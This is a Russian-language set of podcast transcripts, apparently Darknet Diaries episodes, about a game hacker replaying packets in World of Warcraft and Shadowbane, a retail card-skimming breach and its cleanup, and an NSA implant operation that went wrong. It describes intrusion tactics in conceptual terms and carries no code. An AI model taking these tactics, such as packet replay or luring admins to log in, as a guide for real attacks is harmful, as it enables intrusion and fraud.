МАНФРЕД: Мой персонаж не был достаточно силен, чтобы пройти Molten Core, поэтому мы начали собирать друзей. Я улучшал своих персонажей и персонажей моих друзей. Мы сделали это в 8 человек. Это было очень весело. Мы использовали этот эксплойт таланта, чтобы проходить подземелья с очень небольшим количеством людей, вероятно, от восьми до девяти месяцев.

Ведущий: Разработчики игры так и не обнаружили и не поймали Манфреда за этими взломами.

МАНФРЕД: У них есть метрики по всем этим подземельям, и они могли видеть, как быстро группа игроков может пройти подземелье или что-то еще, но они долгое время бездействовали. Я чувствовал себя подобным Богу.

Однако, взлома Манфреда не могли не иметь последствий. Насколько этот взлом безобидный? Как на это отреагировал закон? Продолжение в следующей части.

Эпизод 16: Как стать непобедимым в игре

Вступить в наш чат

Ведущий: Оставшись безнаказанным, Манфред вернулся к реинжинирингу клиента. Он обнаружил, что на производственных серверах были включены отладочные пакеты. Потратив время на анализ пакетов отладки, он нашел способы делать удивительные вещи.

МАНФРЕД: Такие вещи, как трансляция сообщений на весь сервер или телепортация непосредственно к игроку.

Ведущий: Даже после использования этих эксплойтов в течение нескольких месяцев его все еще не поймали и не обнаружили, поэтому в конце концов ему наскучила игра, и он решил посмотреть, как далеко он сможет зайти, прежде чем его забанят.

МАНФРЕД: Обычно это заканчивается в PVP. Люди жалуются, когда их мгновенно убивают. Мы начали выходить в земли PVP и просто убивали людей одним выстрелом. Игроки начали жаловаться. Они делали снимки экрана, писали админам, и довольно быстро, может быть, через одну-две недели, а может быть, через три недели, нас всех забанили.

Ведущий: Что меня больше всего удивляет в этой истории, так это то, как в такой популярной игре World of Warcraft могут быть такие эксплойты. В игре участвовало десять миллионов игроков, и все они платили за игру по 15 долларов в месяц. Разработчики игры зарабатывали более 100 000 000 долларов в месяц или 3 000 000 долларов в день. С таким бюджетом хотелось бы, чтобы они раскрыли все эксплойты.

МАНФРЕД: Это было огромным упущением со стороны разработчика. Им не стоило включать пакеты разработки в свою производственную MMORPG масштаба World of Warcraft.

Ведущий: Хотя Манфреду запретили играть в World of Warcraft, для него это не было проблемой, потому что он мог просто перейти к другой игре. За несколько лет до этого он играл в игру Shadowbane. Это была ММОРПГ. Вы повышаете уровень своего персонажа, убивая монстров, улучшая предметы, а также сражаетесь с другими игроками, но только в определенных областях. Манфред был поражен тем, насколько глючной была эта игра. Он пришел к выводу, что игра, должно быть, пропустила альфа-тестирование и бета-тестирование и перешла непосредственно к финальному выпуску. За все двадцать лет взломов видеоигр ни одна из них не приблизилась к тому, насколько плох Shadowbane с точки зрения ошибок.

МАНФРЕД: Я думаю, что Shadowbane заслуживает отдельной категории и, возможно, фильма, снятого про его косяки. Shadowbane был безнадежно небезопасен.

Ведущий: История начинается так же, как и другие. Манфред играл в игру, хорошо разбирался в ней, а потом ему стало скучно, и он начал реинжиниринг клиента. Он увидел, что когда вы получаете очки опыта, в игру отправляется пакет с указанием того, сколько очков опыта вы только что заработали. Он захватил этот пакет, отправил его во второй раз и, конечно же, получил очки опыта в игре в два раза больше. Он мог продолжать получать неограниченное количество очков опыта, просто отправляя специально созданные пакеты на сервер. За несколько минут он набрал более 100 уровней. Он обнаружил, что не было проверки на стороне сервера для любого отправленного им пакета, поэтому он мог делать почти все, что хотел. Он мог открывать хранилища других игроков, забирать из них предметы, он мог загружать в свой инвентарь любое оборудование. Он мог даже получить огромное количество силы и очков талантов.

https://i.gyazo.com/6a9826a3b8d9dcbec0bb73529c8017bd.png

Shadowbane, отправка пакетов на сервер с указанием, сколько опыта нужно заработать, и увеличение уровней

МАНФРЕД: Почти все, что я пробовал, любой эксплойт, который я пробовал, работал.

Ведущий: Он пытался узнать, захочет ли кто-нибудь купить у него снаряжение, золото или персонажей за настоящие доллары. Но не было достаточного спроса, потому что не было достаточного количества игроков, играющих в Shadowbane. Он решил, что игра настолько глючная, что больше не хочет в нее играть.

https://i.gyazo.com/a4c619bf7ef4e4f0465b52cb435b1e23.png

Shadowbane, 16 776 775 очков талантов

https://i.gyazo.com/2ee6c35417bbe87352c1abbd8822af98.png

МАНФРЕД: Мы просто решили сделать финальный взлом, удалить игру и двигаться дальше. Нам пришлось пойти на крайние меры. Потому что, если бы мы убили несколько игроков здесь и там и бла-бла-бла, они бы пожаловались разработчикам на форумах, и они проигнорировали бы это. Но если мы проведем массовую атаку, меняющую игровую механику, когда она убьет сотни игроков, полностью изменит правила игры, тогда разработчики задумаются. Одним из наших грандиозных финальных действий была телепортация монстров высокого уровня в города-убежища, в которых новые игроки начинали игру. Скажем, создав нового персонажа в Shadowbane, вы отправляетесь на этот маленький остров, где игра учит вас, как играть. Он должен быть полностью безопасным.

Но мы телепортировали туда монстров 200-го уровня, чтобы убить любого, кто присоединился к игре. Вы присоединились к игре как новый игрок, а затем внезапно этот дракон 200-го уровня просто полностью уничтожает вас. На этом маленьком острове новых игроков мы, наверное, убили сотни игроков. Новые игроки присоединялись к игре и возрождались в течение часа. Мы также телепортировали под океан целый город, полный людей. Они медленно тонули. Они тонули недостаточно быстро, поэтому мы также телепортировали с ними монстров, чтобы монстры убивали тонущих игроков. Мы убивали новичков, присоединяющихся к игре, мы убивали активных игроков, мы телепортировали игроков в океан, это был просто полный хаос.

Ведущий: И все же этого было недостаточно. Он решил сделать каждую безопасную зону в игре зоной PVP. Это означает, что игроки могут атаковать других игроков в любой точке мира. Негде было спрятаться.

МАНФРЕД: Я и мои друзья просто и уничтожали всех с помощью очень сильных персонажей. Да, это был полный хаос и беспорядок. Мы знатно повеселились.

Ведущий: Хаос Манфреда затронул всех на сервере. Куда ни глянь, повсюду были сотни надгробий, и всем было интересно, что происходит в игре? Некоторые люди говорили, что боги сошли с ума, а другие говорили, что в игре есть ошибки. Примерно через час полного хаоса серверы отключились. Его и его друзей забанили в игре, и сервер откатился на точку сохранения до того, как начался хаос и все игроки были восстановлены.

МАНФРЕД: Изначально люди из Shadowbane думали, что кто-то получил незаконный доступ к их серверам, и они думали, что их серверы были скомпрометированы, тогда как все, что мы делали, это просто использовали внутриигровую механику. Я смотрю на последствия на форумах Shadowbane, и некоторые игроки говорят, что это должно происходить чаще, это было самое веселое, что они когда-либо получали с тех пор, как купили игру. Некоторые игроки были немного раздражены, а некоторые говорили: «Эй, это довольно весело. Давай сделаем это снова».

Ведущий: Взлом Shadowbane был настолько нелепым, что Wired написал об этом статью еще в 2003 году, когда это произошло. До сих пор никто не знал, кто за этим стоит. Wired опубликовал комментарий от разработчиков игры, в котором говорится: «Мы работаем с правоохранительными органами и обещаем всем вам, что эти люди будут преследоваться по всей строгости закона».

МАНФРЕД: Это все был понт. Я думаю, они поняли, что их серверы не были скомпрометированы, и мы просто использовали игровой протокол и игровую логику, находя неконтролируемые функции в протоколе.

Ведущий: Разработчики игр или правоохранительные органы никогда не связывались с Манфредом по поводу этого события. Манфред пытался сотрудничать с разработчиками игр, чтобы ответственно раскрывать обнаруженные им ошибки.

МАНФРЕД: В самом начале, когда я начал этим заниматься, я пытался работать с разработчиками игр. Это всегда имеет неприятные последствия. Например, Anarchy Online. Я думаю, что она вышла в 2000 или 2001 году. Я связался с админом в игре и говорю: «Эй, я хочу поговорить с одним из ваших разработчиков о некоторых уязвимостях, которые я нашел». На следующий день мы просыпаемся, а наши аккаунты забанены. Это произошло дважды в начале, и если это происходит дважды или если это происходит в одной игре, а затем в другой игре, обычно это будет другая игра для разработки. Вы должны предположить, что, возможно, игровая индустрия не хочет работать с людьми, ответственно раскрывающими информацию о взломе.

Я думаю, что их основная идея заключается в том, что они не хотят, чтобы люди занимались реинжинирингом своего клиента. Может быть, я думаю, это их мотив для бана людей, которые находят подобные вещи. Это было несколько нелогично, потому что они банили людей, которые пытаются им помочь.

Ведущий: В этом году Манфред выступил с докладом на Defcon. Он собирался выявить две неисправленные ошибки в Elder Scrolls Online и WildStar Online. Он решил не демонстрировать взлом.

МАНФРЕД: После разговора ко мне подошла одна из компаний, стоявших за Elder Scrolls Online. Они сказали типа вот моя визитка, давай поговорим. Я разговаривал с ними. Я показал им эксплойт вскоре после Defcon. Пока мы были еще в Вегасе, я показал им это лично. Они меня отблагодарили. Другой взлом для WildStar Online, я отправил им электронное письмо с описанием проблемы и ее последствий. Они сказали: "Круто, спасибо". Что касается Elder Scrolls Online, я в последний раз проверял около полутора месяцев назад, то есть примерно через шесть недель после Defcon и раскрытия информации о взломе. Баг до сих пор не исправлен.

Ведущий: Но это всего лишь первая глава эпического путешествия Манфреда. Все эти эксплойты, которые вы слышали, просто для развлечения, но он нашел эксплойты в других играх, которые изменили его жизнь на десятилетия. Он нашел способы превратить свои виртуальные предметы в настоящие доллары США. Это больше не было развлечением и играми. Это стало серьезным полноценным бизнесом.

МАНФРЕД: Позвольте мне просто сказать, что, имея возможность получить дневную работу в качестве инженера-программиста, и вы можете себе представить, сколько инженер-программист зарабатывает в наши дни, учитывая возможность делать это, а не взламывать онлайн-видеоигры, я решил взламывать онлайн видеоигры, потому что мне платили хорошо, а также потому, что я занимался собственным бизнесом.

Ведущий: Присоединяйтесь к нам во второй части этой истории, когда мы переходим от ввода монет в игру к извлечению монет из игры.

Эпизод 18: 100 тысяч банковских карт в руках у хакеров

Мэтт: Последняя проверка показала ужасное. Хакеры не просто украли миллионы данных кредитных карт. Около семи-восьми месяцев хакеры были в системе магазина...

https://i.gyazo.com/513edd3b77786cc4bf88949300053431.png


КОРТНИ: Они провели в сети, по крайней мере, целый месяц разведки, прежде чем создали свое идеальное вредоносное ПО. Затем даже на протяжении всего времени мы видели, как они вносили в него небольшие изменения, продолжая двигаться вперед. Они точно знали, где взять кредитные карты в каждой системе.

Мэтт: К сожалению, система, которую они впервые скомпрометировали, в которую они впервые вошли, больше недоступна. Здесь мне хочется думать, что это, вероятно, был целенаправленный подход, даже фишинг, но кто знает. Никогда не узнаешь, пока не найдешь.

ДЖЕК: Фишинг — это когда хакер нацеливается на сотрудника, чтобы попытаться заставить его щелкнуть что-то, на что он не должен нажимать. Это может быть электронное письмо с вредоносной ссылкой, это может быть документ Word с включенными макросами. Как только человек нажимает на вредоносную ссылку, этот компьютер может быть заражен и затем находиться под контролем хакера. Когда хакер находится в сети, он может перейти на другую машину, чтобы начать установку своего вредоносного ПО.

Мэтт: С помощью простой математики вы обчищаете шестьсот магазинов за восемь месяцев. Этот период времени включает в себя лето, несколько выходных с распродажами, подготовку к Рождеству и тому подобное. Включая все эти различные периоды времени.

КОРТНИ: Да, я хочу сказать, что нам потребовалось по крайней мере две недели, чтобы просмотреть все кредитные карты и по-настоящему их расшифровать и убедиться, что все, что у нас было, было настоящими номерами карт. Что-то особенное в этом случае, с которым мы столкнулись, это кредитные карты, которые выглядят как номера кредитных карт, но на самом деле не являются действительными номерами карт. Это было то, что нам пришлось сделать много дедупликации и проверки, как с нашей стороны, так и с небольшой помощью брендов карт, чтобы определить, действительно ли то, что мы видели, было номерами карт.

Мэтт: Мы начали обнаруживать просроченные данные карт. Как мы находим так много данных кредитных карт, срок действия которых истек? Одно дело, если вы обнаружите, скажем, у вас есть двадцать номеров за день, и вы обнаружите, что срок действия одного истек. Ты такой: «О, ладно, кто-то случайно стащил старую карту или что-то в этом роде, верно?» Но потом вы начинаете задаваться вопросом, почему я вижу этот значительный процент карт, срок действия которых уже истек? В данном случае, если вы помните, я упомянул, что вредоносное ПО было на задней панели домашних систем.

В задней части работали SQL-серверы. На SQL-серверах хранились исторические незашифрованные отслеживаемые данные, которые загружались в память, и вредоносное ПО собирало их. Они собирали транзакции четырехлетней давности. Злоумышленники фактически заглянули в прошлое. Они просматривали транзакции трех-четырехлетней давности, о которых у них не было информации.

Ведущий: Теперь команда готова приступить к удалению вредоносного ПО из сети. Им нужно было понять каждую дыру в сети и залатать каждую, чтобы хакеры не могли вернуться.

КОРТНИ: На самом деле нам не нужно было отключать какие-либо серверы. Как только мы смогли действительно найти эти опорные точки, отключив их или, по крайней мере, убедившись, что у нас есть блокировка процессов, мы смогли остановить их по большей части в сети.

МЭТТ: Да, в итоге мы закрыли расчетные палаты, центральные точки, которые они использовали. В первый раз, когда мы выгнали их, мы действительно увидели, как они снова вошли через Азию, и в течение примерно трех секунд после повторного входа они повторно скомпрометировали сорок различных систем.

КОРТНИ: Я думаю, было интересно наблюдать, как они возвращаются так быстро, но также было интересно посмотреть, какие инструменты они сразу использовали. Потому что в тот момент у нас был живой отклик. По сути, мы могли сидеть там и отслеживать, что они делали, и точно видеть, как они двигались.

Ведущий: Команда обнаружила, что помимо вредоносного ПО, во многих системах также были установлены лазейки, благодаря которым хакеры продолжали проникать внутрь. Команда смогла отключить каждую опорную точку и предотвратить выход кредитных карт из сети. Было приятно наконец взять эту вредоносную программу под контроль. Пока они очищали сеть от вредоносного ПО, они также дали компании несколько предложений по улучшению своей безопасности.

КОРТНИ: Да, некоторые изменения пароля были необходимы, может быть, что-то вроде изменения их сетевой инфраструктуры, чтобы она не была такой плоской. Это определенно было одной из вещей, которые позволили этому вредоносному ПО проникнуть так далеко, потому что каждая система могла получить доступ к любой другой системе. Были одинаковые общие пароли, учетные записи администраторов, привилегированные учетные записи, которые были доступны на многих, многих машинах в сети. Я думаю, что это был большой урок того, как правильно защитить вашу сеть и убедиться, что ваше шифрование на месте, чтобы предотвратить это снова.

Ведущий: Попытаться проследить этот взлом до ответственного за это человека иногда невозможно. Вы можете искать подсказки во вредоносном ПО, такие как язык, который использовался при его написании, или часовой пояс, на который оно установлено, но это всего лишь небольшие подсказки, которые не очень сильны. Попытка выяснить, кто совершил взлом, называется атрибуцией.

МЭТТ: Я твердо верю, что атрибуция на самом деле ни к чему не приведет, если только вы не занимаете политическую или руководящую должность и не должны принимать решения о том, кто может стоять за этой клавиатурой и тому подобные вещи. Однако всегда интересно узнать. Единственное, что я могу сказать об этом, это то, что мы еще не упомянули. В Северной Америке был один сервер, который рассматривался как расчетная палата. Затем были две дополнительные системы с задним ходом. В Европе было примерно то же самое.

Большая часть самих точек входа фактически началась в Азии. На самом деле это началось в основном в Юго-Восточной Азии и тому подобное. Это не дает никакой атрибуции. Просто когда вы пытаетесь получить данные кредитной карты, это очень интересное место для начала, если вы понимаете, о чем я. Вы — компания со штаб-квартирой в США. Какой у вас есть выход? Вы должны восстановить свою сеть. Вы должны достичь точки, когда вам не нужно бороться с пожарами каждый день. У тебя действительно нет времени. Что, ты собираешься нанять команду, чтобы преследовать этих парней или что-то в этом роде? Удачи.

Ведущий: Сколько было окончательно украдено кредитных карт?

Мэтт: Это число, насколько мне известно, все еще выясняется, но я думаю, что после того, как мы наткнулись на все, что мы могли найти, мы получили не меньше 100 000. Это все. Это было очень неожиданное число.

Ведущий: Я мало что знаю о текущих условиях черного рынка карточных игр, но можно с уверенностью сказать, что этих карт, вероятно, слишком много для этих хакеров, чтобы попытаться выцарапать из себя деньги. Возможно, они где-то продают эти карты оптом. Карты стоят от десяти до ста долларов каждая, поэтому, даже если они получили по десять долларов за карту, это означает, что эти хакеры заработали на этой компании миллион долларов. Теперь компания должна сделать это снова, чтобы попытаться решить проблему.

Мэтт: В первую очередь на компанию ложится работа с банками, работа с компаниями, выпускающими кредитные карты, и выпуск новых карт.

Ведущий: Об этом взломе было объявлено публично, и он попал в новости, но реакция публики на него не имела большого значения.

Мэтт: Короче говоря, это было не так безумно, как вы могли бы подумать. Это было не так уж важно. Я говорю, что, поскольку у вас есть предшественники, такие как Home Depot и Target, и некоторые из этих огромных крупных нарушений, у вас есть такие предшественники, о которых сообщали недели, если не месяцы.

КОРТНИ: Некоторые из более крупных нарушений, которые мы недавно наблюдали, включая номера социального страхования, я думаю, что кредитные карты немного отстают. Вы всегда беспокоитесь, что его украдут, но в глубине души многие люди думают: «О, я просто заменю его, куплю новый».

Ведущий: Помимо того, что это является серьезной головной болью для этой компании и еще большей головной болью для компаний, выпускающих кредитные карты, и банков, это также может серьезно повлиять на людей, чьи карты были украдены. В начале этого эпизода вы начали получать известия от Тома. Возможно, данные карты Тома были украдены и проданы на черном рынке, как в истории, которую вы только что слышали. Кто-то использовал его карту мошенническим образом, и его банк проводил расследование, чтобы выяснить, что пошло не так. Давайте послушаем, чем закончится его история.

ТОМ: Ну, утро, когда они это сделали, было 12 или 13 декабря, так что это фактически уничтожило Рождество. Я лицензированный подрядчик, и я получаю часть своего бизнеса через компанию, и мои счета заморожены, и ничего не может войти или выйти, первое, что я обнаружил, это то, что они перестали работать на меня, и они сказали хорошо, ваш счет просрочен, и ваш счет перерасходован, и мы не можем получить деньги, поэтому вы остановлены, пока что-то не произойдет.

Но, к счастью, у меня была финансовая поддержка, поэтому я смог выжить, но не мог работать, пока об этом наконец не позаботились. Теперь я мог вести дела со счетом, но даже после этого мне понадобилось пару месяцев, чтобы все уладить. Это был большой перерыв в моей жизни.

Ведущий: Кортни и Мэтт выступили с докладом на саммите Kaspersky SAS в начале этого года. В своем выступлении они подробно рассказали об этом новом виде вредоносного ПО. Они также сообщили об этом антивирусным компаниям, чтобы его можно было обнаружить в будущем. С тех пор Мэтт ушел из Kroll и теперь работает в Cylance, а совсем недавно был принят в качестве инструктора SANS, преподающего цифровую криминалистику и реагирование на инциденты.

Эпизод 20: Что бывает, когда хакер встречает хакера?

Вступить в наш чат

Ведущий: Иногда ожидание входа в админку может занять много времени: дни, недели, месяцы. Я слышал, что хакеры иногда создают проблемы на веб-сервере, например, увеличивают нагрузку на ЦП или приводят к сбою приложения. Но зачем это делать? Что ж, если веб-сервер ведет себя проблематично, это приведет к тому, что администратор войдет в систему для устранения неполадок. Когда они это сделают, паф. Они только что попали в ловушку. Но в нашем случае ожидание было не таким долгим.

https://i.gyazo.com/2870e50c92b8a2799eb071aa5dfe3199.png

АНБ: Один из администраторов входит в систему. Мы видим, как это происходит. Мы получаем необходимую информацию и вставляем имплант в аппарат.

Ведущий: Вы только что услышали пятую фазу цепочки киберубийств: монтаж. Мы только что установили имплантат в целевую систему. Имплантат — это ошибка, троян, инструмент удаленного доступа, который позволяет нам в значительной степени завладеть этим компьютером. Для тех из вас, кто знаком с Metasploit…

АНБ: Просто представьте что-то вроде Metasploit на большом количестве стероидов.

Ведущий: Следующим этапом цепочки киберубийств является командование и контроль. Тот факт, что имплантат находится в машине, не означает, что он что-то сделает. Кто-то должен сказать ему, что делать. В этом случае теперь у нас есть возможность удаленного доступа к компьютеру сетевого администратора. Это наша команда и контроль над целевым компьютером. Сейчас мы очень близки к завершению нашей миссии. Нам осталось только взять под контроль компьютер администратора, а затем получить доступ к базе данных и взять нужные нам данные. Поэтому мы немного подождем, прежде чем залезть в компьютер администратора, чтобы не выглядеть подозрительно.

АНБ: Мы ждали около дня, полтора дня, чтобы перейти к интерактивной работе с коробкой, фактически использовать ее в интерактивном режиме. Как только мы использовали его в интерактивном режиме, в то время как другой человек использовал его, мы вошли в систему, когда они были, что обычно так и работает. Мы начали смотреть на скриншоты рабочего стола и увидели открытый браузер и десятки открытых вкладок в браузере. Мы начали просматривать множество скриншотов и просматривать содержимое вкладок. Это был человек, который гуглил это странное поведение Windows.

Ведущий: Компьютер администратора, в который мы проникли, вел себя странно. Он отображал много ошибок, и некоторые программы аварийно завершали работу. Было определенно похоже, что у этого администратора был какой-то вирус.

АНБ: Сначала мы это увидели, подумали, что это странно. Интересно, эти проблемы с его компьютером появились раньше, чем мы там были. На самом деле мы не знали, но у нас было подозрение, что это как-то связано с нами. Без нашего ведома и с того времени, когда мы впервые собрали нашу информацию через открытый источник и когда мы установили имплантат, он обновил свою операционную систему. По сути, он обновил Windows до следующей версии. Обычно в худшем случае ваш имплантат не работает, потому что он несовместим, верно, по какой-то причине. Это несовместимо и не работает, и это отстой, и вы действительно расстроены этим. Я бы предпочел, чтобы это было результатом здесь.

Вместо этого имплантат заработал, поскольку он установился там, где должен был, и начал работать, как и ожидалось. Проблема заключалась в том, что он плохо работал с более новой версией Windows, которая была на этом компьютере, и, к сожалению, начал вызывать очень странное поведение Windows. Это очень странное поведение приняло наихудшую из возможных версий, то есть то, что было хорошо видно пользователю. Теперь, когда мы на коробке и точно знаем, какая это была версия Windows, мы воссоздали ее в нашей собственной лабораторной среде. Я знаю, какая у него версия Windows, и я знаю аппаратное обеспечение. По сути, я перестроил ту же самую машину в нашей среде, бросил на нее наш имплантат и увидел, что наш имплантат вызывает это странное поведение. Это были очень, очень плохие новости для нас, потому что так тебя поймают. Это было ужасно.

С точки зрения политической реакции, такие вещи получаются — уведомления о подобных вещах доходят до самых высоких уровней правительства, потому что, когда вы попадаете в сеть, подобную этой, премьер-министры звонят друг другу. Если бы дела пошли достаточно плохо, нам пришлось бы информировать все руководство агентств и высшее руководство правительства. В этот момент все были очень обеспокоены, потому что мы уже были на веб-сервере. Мы уже проделали большую работу. Мы чувствовали себя довольно комфортно, поэтому мы уже развертывали довольно сложные большие имплантаты в сети. Этот, который вызывал эти проблемы, не был загрузчиком Stage 1.

Это был относительно сложный — на самом деле довольно сложный полнофункциональный имплантат, который мы не могли позволить себе потерять и не могли позволить себе попасть в сеть. Как только мы поняли, что происходит, это снова правительство, так что все тревоги начинают срабатывать. Вы должны начать рассказывать многим людям. Вы должны начать писать много служебных записок и посещать много совещаний, чтобы постараться, чтобы все были в курсе того, что происходит, каковы риски и что мы собираемся делать. Конечно, теперь первый порыв — удалить его или удалить имплант. К сожалению, поскольку он уже вызывал так много проблем со стабильностью, проблема заключалась в том, что если мы попытаемся добраться до него, чтобы удалить его, это может сделать его еще хуже. Мы не знали, так что риск был в том, чтобы ничего не делать, и прямо сейчас он просто думал, что у него технические проблемы, а не проблема с безопасностью, поэтому мы подумали, что все в порядке.

Риск заключается в том, чтобы либо остаться с тем, что у нас есть, и переждать техническую ерунду, надеясь, что он не догадается, что на самом деле это не техническая проблема, а проблема с безопасностью, или мы попытаемся удалить ее и вызвать какие-то другие странные вещи. случиться, что делает это еще хуже. Тогда мы совсем облажались. Решили оставить и не удалять, а принять ту ставку. Ситуация ухудшилась примерно на неделю, потому что мы не только смотрим их в Google в поисках решения проблемы, например, в поисках симптомов, которые он видит в Windows, мы читаем его электронные письма и видим его чаты с ИТ-специалистами, рассказывая им что происходило и вставлять билеты на неприятности. Мы видели беседу с этим ИТ-специалистом, которая была типа: «Привет, не мог бы ты подойти ко мне в 2:00, чтобы взглянуть?» В этот момент все начали очень беспокоиться, больше, чем мы уже были.

Ведущий: В данный момент дела идут не очень хорошо. В офисе очень напряженно и волнительно. Используемый имплантат был дорогим и секретным. Если бы он был обнаружен, это могло бы привести к тому, что его отследили до злоумышленников и потеряли этот дорогой и секретный имплантат. Но на данный момент мы успешно завершили шесть из семи этапов цепочки киберубийств. Остался только один этап, и это выполнение действия над целью. В нашем случае наша цель — использовать компьютер администратора для получения данных из базы данных Oracle, но команда не решается закончить работу.

АНБ: Проблема была в том, что это была большая сеть, и мы знали, какая база данных нам нужна. Мы знали, что существует база данных определенного типа, к которой мы хотели получить доступ, но мы не знали точно, где она находится в сети. В этот момент у нас есть высокий риск быть пойманным. Проблема в том, что мы наблюдаем, как они устраняют неполадки, и если они устраняют неполадки, устраняют неполадки и устраняют неполадки, а затем в какой-то момент выясняют, что здесь что-то действительно не так, и нам нужно позвать людей из службы безопасности и начать присматриваться поближе. Последнее, чего мы хотели бы, — это иметь более широкое присутствие в сети. Даже если это происходит на других машинах в других местах в сети, которые не могут, в тот момент, когда ваше реагирование на инциденты вмешивается и начинает блокировать вещи, мы облажались.

В этот момент мы хотим свести наше присутствие к минимуму, насколько это возможно, без потери доступа. На данный момент этой минимизацией был этот компьютер, на котором у нас возникла проблема, и веб-сервер. Вот оно. Само, очень ясное без даже каких-либо дебатов решение было сидеть, лежать тихо. Ничего не делай. Пусть это происходит, потому что никто не хотел увеличивать профиль риска, пока мы не узнали, чем это обернется.

Ведущий: Команда ждет и наблюдает. Дни проходят. Администраторы пытаются устранить ошибки, которые они видят. Проходит неделя. Он продолжает устранять неполадки, и на второй неделе администратор обращается за помощью к ИТ.

АНБ: Да, на второй неделе приходят ИТ-специалисты и смотрят на компьютер, и мы знаем, что они подходят к рабочему столу человека, потому что мы видим, как они назначают встречи. Мы подошли к этому моменту, когда по характеру заявки на устранение неполадок мы можем сказать, что они зашли в тупик. Они не могут понять, почему. Они не могут понять, что происходит. Они не могут понять причину происходящего. Они не могут определить причину, и она кажется им недетерминированной. Мы знаем, почему это происходит. Я знаю, что делает имплант и почему Windows ведет себя таким образом, но, поскольку они не знают, что там имплант, для них поведение совершенно недетерминировано. Поскольку это недетерминировано, они не могут разработать для него техническое решение.

Окончательное решение, к которому они пришли, заключалось в том, чтобы просто стереть его и начать сначала. Это был причудливый имплантат, но он был просто на уровне пользователя и находился на жестком диске, так что в тот момент, когда они стерли диск и пересняли его, все было в порядке. Они удалили наш имплантат, и мы были в порядке. Это было значительным облегчением. Слава Богу, все кончено, но, черт возьми, нас всех уволят? Это чья-то разумная реакция на подобные события на рабочем месте, когда все пошло не так. По сути, вы отвечаете за ту группу, где что-то пошло не так. Это все было на мне. Знаете, это был момент, когда я, наверное, возьму коробку и соберу свой стол. Но а) это правительство, поэтому никого не увольняют и б) на самом деле это не было результатом. После этого мы провели целую вскрытие, чтобы посмотреть, что произошло, как это произошло, почему это произошло и как это предотвратить.

Постфактум было установлено, что никакой халатности в игре не было. Никто не сделал ничего плохого. Именно это и произошло. Шанс, что мы проведем два месяца исследований, потратим тридцать дней на принятие решений и проведение совещаний, а затем за эти тридцать дней выполним операцию, один из администраторов обновит Windows. Это не супер высокая вероятность того, что это произойдет, и нам просто не повезло. К сожалению, эти две звезды пересеклись на небе, и это произошло. Если бы прошло полгода, и мы не попытались бы повторно обновить нашу информацию и сделать ее более свежей, результат, скорее всего, был бы хорошим, вы слишком долго ждали. Верно, ты должен был это знать. Слишком многое может измениться за шесть месяцев. Но тридцать дней было разумно, потому что опять же, это правительство. Тридцать дней уходит на оформление документов, организацию встреч и просто административные дела.

Тот факт, что это произошло через тридцать дней, тот парень обновил Windows: это считалось приемлемым. Единственным другим последствием было то, что когда мы подошли к этой машине сбоку, должны ли мы были сделать что-нибудь тактически, прежде чем поместить имплантат в эту коробку? Были дебаты по этому поводу. Должны ли мы были захватить учетные данные и просто интерактивно взаимодействовать с этой машиной только для того, чтобы захватить такие вещи, как ее ОС, антивирус и все такое? Это было оперативное решение, которое мы приняли в то время, очень тактическое решение. Но поскольку мы сделали открытый исходный код и знали, что там есть, казалось бы, причин для этого было меньше. Вот оно.

Ведущий: Очистив машину от имплантата, команда может расслабиться, зная, что их прикрытие не будет раскрыто, а их дорогостоящая уловка не будет обнаружена. Как насчет первоначальной цели получить доступ к базе данных?

АНБ: На самом деле у нас никогда не было доступа к базе данных. Не из-за этого, на самом деле просто оказалось, что сеть была настроена таким образом, что наш путь туда был чрезвычайно сложен от того места, где мы находились в сети, до того места, куда нам нужно было добраться. Как и в любой другой бизнес-среде, у нас были конкурирующие требования. В какой-то момент, наверное, через полтора месяца после этого инцидента, после этого небольшого инцидента, мы пришли к тому, что ладно, я знаю, где находится сервер Oracle. Я знаю, кто такие админы, но наша способность добраться до него сложна. Это займет некоторое время. Мы можем это сделать, но хотим ли мы этого?

В то же время у меня было еще три требования, которые я должен был удовлетворить. Эти требования требовали некоторых из тех же людей, которых я сейчас использовал для работы над этим, так что это было похоже на то, что мы делаем? Можем ли мы просто поддаться наживке и уйти или просто пойти ва-банк и пойти на это? Решили отказаться от наживки и уйти. Это происходило все время. Потому что я думаю, что любой хакер, независимо от того, являетесь ли вы представителем ABT национального государства или ребенком в подвале своей мамы, все знают, что это большая удача, что все работает. Только так много мысли и разума входит в это.

В конце концов, это большая удача, и я бы сказал, что по статистике за те годы, что я занимаюсь этим, удачи нет или она заканчивается более чем в половине случаев, потому что это сложно и становится все труднее, потому что люди просто в целом больше осведомлены о кибербезопасности и информационной безопасности. Они немного умнее, этого достаточно, чтобы знать, может быть, не нажимать на ссылку или, может быть, не посещать этот веб-сайт с работы или с вашего рабочего компьютера, и, возможно, не нажимать «ОК», когда появляется сообщение «Flash Needs to Update».

Эпизод 21: Для чего хакеры крадут записи о пациентах?

Вступить в наш чат

Ведущий: 2015 год был полон утечек данных. В начале года было два крупных нарушения со стороны поставщиков медицинских услуг. В феврале Anthem объявил, что было украдено восемьдесят миллионов записей о пациентах. Примерно в то же время был обнаружен Premera Blue Cross, и они обнаружили, что, возможно, одни и те же актеры были в их сети и признали взлом одиннадцати миллионов записей пациентов. Таким образом, только в первом квартале 2015 года хакеры украли почти сто миллионов записей о пациентах. На самом деле они не воровали медицинские записи; вместо этого они захватили такие вещи, как имена, дни рождения, медицинские удостоверения, номера социального страхования, уличные адреса, адреса электронной почты, информацию о сотрудниках и данные о доходах. Люди не были уверены, для чего это может быть использовано, кто это делает и зачем.

Его просто продали на темном рынке за быстрый биткойн? Была ли эта информация собрана в рамках многоэтапной атаки? Каким образом эта информация может быть ценной для хакеров? Как вы можете зарабатывать деньги, если знаете чье-то имя, адрес, номер социального страхования и тому подобное? Я позволю вам подумать об этом на минуту. Давайте поговорим о налоговой. Для моих неамериканских слушателей Служба внутренних доходов — это правительственное агентство США, которое собирает налоги. Большинство граждан и предприятий США должны каждый год отчитываться о своих доходах в IRS и платить налоги в зависимости от того, сколько денег они заработали. IRS приходится обрабатывать сотни миллионов налоговых форм в год. Это архаичная и слишком сложная система. По сути, мы, американцы, платим процент от денег, которые мы зарабатываем, правительству, чтобы они могли погасить государственный долг за армию, социальное обеспечение, медицинское обслуживание пожилых людей и тому подобное.

https://i.gyazo.com/ecd9e974566415127f831dea67908360.png

